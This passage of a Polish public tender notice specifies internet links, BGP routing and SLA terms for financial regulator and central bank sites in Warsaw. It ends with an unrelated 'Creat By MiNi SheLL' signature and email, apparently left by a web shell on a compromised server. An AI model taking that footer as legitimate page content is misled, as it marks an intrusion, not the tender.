2.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza podstawowego do sieci Internet o przepustowości co najmniej 100 Mbit/s  w lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie. Łącze musi być wykonane w technologii przewodowej i zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
3.Utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu, przez okres obowiązywania umowy.
4.W ramach dostępu do łącza internetowego zapewnienie przez Wykonawcę obsługi routingu BGP dla systemu autonomicznego (AS) Zamawiającego.
5.Zagwarantowanie przesyłania ciągłego strumienia danych z prędkością, co najmniej 100 Mbit/s, do operatorów trzecich tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku.
6.Zapewnienie następujących minimalnych parametrów SLA:
a.Miesięczna Dostępność Usługi - 99,5% (Wartość Progowa)
b.Czas Reakcji na awarię - 20 minut,
c.Czas Usunięcia awarii - 24 godziny.
Gdzie:
-Awaria - każda sytuacja, w której usługa nie jest świadczona zgodnie z założonymi w niniejszej umowie parametrami. W przypadku ponownego wystąpienia tego samego problemu w ciągu do 1 godziny od usunięcia poprzedniej awarii, zdarzenie traktowane jest jako ta sama awaria, o łącznym czasie trwania liczonym od chwili rozpoczęcia pierwszej awarii.
-Miesięczna Dostępność Usługi - wyrażona w % sumaryczna liczba godzin dostępności usługi dla danego łącza w stosunku do całkowitej liczby godzin w miesiącu kalendarzowym (nie dotyczy uzgodnionych z Zamawiającym prac serwisowych Wykonawcy)
-Czas Reakcji na awarię - czas pomiędzy zgłoszeniem awarii przez Zamawiającego lub stwierdzeniem jej przez Wykonawcę a podjęciem przez Wykonawcę działań zmierzających do jej usunięcia.
-Czas Usunięcia awarii - czas przywrócenia pełnej funkcjonalności usługi, zgodnie z założonymi parametrami
II. Warunki dodatkowe w zakresie realizacji przedmiotu zamówienia.
Warunkiem koniecznym jest uzyskanie od NBP pozwolenia na świadczenie usług w lokalizacji NBP ul. Świętokrzyska 11/21  (COK-L1) w Warszawa.
Zamawiający zastrzega sobie możliwość zmiany z dniem 01.12.2014 lokalizacji świadczenia usługi i przeniesienia jej z lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie do lokalizacji UKNF ul. Niedźwiedzia 6E w Warszawie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.40.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. przepustowość łącza - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Świadczenie usługi dostępu do sieci Internet- łącze zapasowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II - Świadczenie usługi dostępu do sieci Internet - łącze zapasowe 
CPV: 72.40.00.00.- 4 usługi internetowe.
I. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest
1.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza zapasowego do sieci Internet o przepustowości co najmniej 20 Mbit/s w lokalizacji Narodowy Bank Polski ul. Świętokrzyskiej 11/21 (COK-L1) w Warszawie. Łącze musi być zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
2.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza zapasowego do sieci Internet o przepustowości co najmniej 20 Mbit/s w lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie. Łącze musi być zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
3.Utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu, przez okres obowiązywania umowy.
4.W ramach dostępu do łącza internetowego zapewnienie przez Wykonawcę obsługi routingu BGP dla systemu autonomicznego (AS) Zamawiającego.
5.Zagwarantowanie przesyłania ciągłego strumienia danych z prędkością, co najmniej 20 Mbit/s, do operatorów trzecich tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku.
6.Zapewnienie następujących minimalnych parametrów SLA:
a.Miesięczna Dostępność Usługi - 99,5% (Wartość Progowa)
b.Czas Reakcji na awarię - 20 minut,
c.Czas Usunięcia awarii - 24 godziny.
Gdzie:
-Awaria - każda sytuacja, w której usługa nie jest świadczona zgodnie z założonymi w niniejszej umowie parametrami. W przypadku ponownego wystąpienia tego samego problemu w ciągu do 1 godziny od usunięcia poprzedniej awarii, zdarzenie traktowane jest jako ta sama awaria, o łącznym czasie trwania liczonym od chwili rozpoczęcia pierwszej awarii.
-Miesięczna Dostępność Usługi - wyrażona w % sumaryczna liczba godzin dostępności usługi dla danego łącza w stosunku do całkowitej liczby godzin w miesiącu kalendarzowym (nie dotyczy uzgodnionych z Zamawiającym prac serwisowych Wykonawcy)
-Czas Reakcji na awarię - czas pomiędzy zgłoszeniem awarii przez Zamawiającego lub stwierdzeniem jej przez Wykonawcę a podjęciem przez Wykonawcę działań zmierzających do jej usunięcia.
-Czas Usunięcia awarii - czas przywrócenia pełnej funkcjonalności usługi, zgodnie z założonymi parametrami
II. Warunki dodatkowe w zakresie realizacji przedmiotu zamówienia.
Warunkiem koniecznym jest uzyskanie od NBP pozwolenia na świadczenie usług w lokalizacji NBP ul. Świętokrzyska 11/21  (COK-L1) w Warszawa.
Zamawiający zastrzega sobie możliwość zmiany z dniem 01.12.2014 lokalizacji świadczenia usługi i przeniesienia jej z lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie do lokalizacji UKNF ul. Niedźwiedzia 6E w Warszawie.
UWAGA: 
Warunkiem obligatoryjnym jest aby łącza dla części I i części II pochodziły od dwóch niezależnych operatorów. Wykonawca nie może składać jednocześnie oferty na część I i część II..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.40.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. przepustowość łącza - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Świadczenie usługi dostępu do sieci Internet - ul. Jasna 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III - Świadczenie usługi dostępu do sieci Internet - ul. Jasna 12
CPV: 72.40.00.00.- 4 usługi internetowe.
I. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest
1.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza kablowego lub radiowego do sieci Internet o przepustowości co najmniej 16 Mbit/s w lokalizacji UKNF ul. Jasna12 w Warszawie. Łącze musi być zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
2.W ramach dostępu do łącza internetowego zapewnienie dla Zamawiającego przez Wykonawcę 30 publicznych adresów IP,
3.W ramach dostępu do łącza internetowego zapewnienie przez Wykonawcę obsługi routingu BGP dla systemu autonomicznego (AS) Zamawiającego.
4.Utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu, przez okres obowiązywania umowy.
5.Zagwarantowanie przesyłania ciągłego strumienia danych z prędkością, co najmniej 16 Mbit/s, do operatorów trzecich tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku.
6.Zapewnienie następujących minimalnych parametrów SLA:
a.Miesięczna Dostępność Usługi - 99,5% (Wartość Progowa)
b.Czas Reakcji na awarię - 20 minut,
c.Czas Usunięcia awarii - 24 godziny.
Gdzie:
-Awaria - każda sytuacja, w której usługa nie jest świadczona zgodnie z założonymi w niniejszej umowie parametrami. W przypadku ponownego wystąpienia tego samego problemu w ciągu do 1 godziny od usunięcia poprzedniej awarii, zdarzenie traktowane jest jako ta sama awaria, o łącznym czasie trwania liczonym od chwili rozpoczęcia pierwszej awarii.
-Miesięczna Dostępność Usługi - wyrażona w % sumaryczna liczba godzin dostępności usługi dla danego łącza w stosunku do całkowitej liczby godzin w miesiącu kalendarzowym (nie dotyczy uzgodnionych z Zamawiającym prac serwisowych Wykonawcy)
-Czas Reakcji na awarię - czas pomiędzy zgłoszeniem awarii przez Zamawiającego lub stwierdzeniem jej przez Wykonawcę a podjęciem przez Wykonawcę działań zmierzających do jej usunięcia.
-Czas Usunięcia awarii - czas przywrócenia pełnej funkcjonalności usługi, zgodnie z założonymi parametrami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.40.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. przepustowość łącza - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com